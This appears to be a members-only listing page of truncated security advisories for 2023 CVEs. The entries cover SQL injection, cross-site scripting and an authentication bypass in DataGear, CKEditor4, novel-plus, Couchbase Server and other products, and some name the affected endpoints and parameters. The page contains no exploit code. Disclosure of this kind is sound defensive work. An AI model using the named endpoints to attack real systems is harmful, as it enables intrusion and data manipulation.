Patreon Members Only

DataGear SQL injection | CVE-2023-1571

NAME__________DataGear SQL injectionPlatforms Affected:Risk Level:6.3Exploitability:HighConsequences:Data Manipulation DESCRIPTION__________DataGear is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the /analysisProject/pagingQueryData endpoint using the queryOrder parameter, which…

Prestashop tshirtecommerce SQL injection | CVE-2023-27638

NAME__________Prestashop tshirtecommerce SQL injectionPlatforms Affected:Paradox IPR512Risk Level:6.5Exploitability:HighConsequences:Data Manipulation DESCRIPTION__________Prestashop tshirtecommerce module is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to function hookActionCartSave and updateCustomizationTable using…

DataGear cross-site scripting | CVE-2023-1572

NAME__________DataGear cross-site scriptingPlatforms Affected:Risk Level:2Exploitability:UnprovenConsequences:Cross-Site Scripting DESCRIPTION__________DataGear is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Plugin Handler component. A local authenticated attacker could exploit…

CKEditor4 cross-site scripting | CVE-2023-28439

NAME__________CKEditor4 cross-site scriptingPlatforms Affected:Risk Level:4.7Exploitability:HighConsequences:Cross-Site Scripting DESCRIPTION__________CKEditor4 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Iframe Dialog and Media Embed plugins. A remote attacker…

FeiFeiCMS cross-site scripting | CVE-2023-1565

NAME__________FeiFeiCMS cross-site scriptingPlatforms Affected:Risk Level:3.5Exploitability:HighConsequences:Cross-Site Scripting DESCRIPTION__________FeiFeiCMS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the \Public\system\slide_add.html script in the Extension Tool component. A remote…

E-Commerce System cross-site scripting | CVE-2023-1569

NAME__________E-Commerce System cross-site scriptingPlatforms Affected:Risk Level:3.5Exploitability:UnprovenConsequences:Cross-Site Scripting DESCRIPTION__________E-Commerce System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the admin/user/controller.php?action=edit script. A remote authenticated attacker could…

DataGear cross-site scripting | CVE-2023-1573

NAME__________DataGear cross-site scriptingPlatforms Affected:Risk Level:3.5Exploitability:UnprovenConsequences:Cross-Site Scripting DESCRIPTION__________DataGear is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Graph Dataset Handler component. A remote authenticated attacker could…

Couchbase Server security bypass | CVE-2023-28470

NAME__________Couchbase Server security bypassPlatforms Affected:Risk Level:5.3Exploitability:UnprovenConsequences:Bypass Security DESCRIPTION__________Couchbase Server could allow a remote attacker to bypass security restrictions, caused by improper authentication in the /api/nsstats endpoint. By sending a specially-crafted…

Python CGI module cross-site scripting |

NAME__________Python CGI module cross-site scriptingPlatforms Affected:Risk Level:6.1Exploitability:HighConsequences:Cross-Site Scripting DESCRIPTION__________Python CGI module is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability…

novel-plus SQL injection | CVE-2023-1594

NAME__________novel-plus SQL injectionPlatforms Affected:Risk Level:7.3Exploitability:UnprovenConsequences:Data Manipulation DESCRIPTION__________novel-plus is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the MenuService function in the sys/menu/list endpoint, which could…

novel-plus SQL injection | CVE-2023-1595

NAME__________novel-plus SQL injectionPlatforms Affected:Risk Level:4.7Exploitability:HighConsequences:Data Manipulation DESCRIPTION__________novel-plus is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the common/log/list endpoint using the sort and order…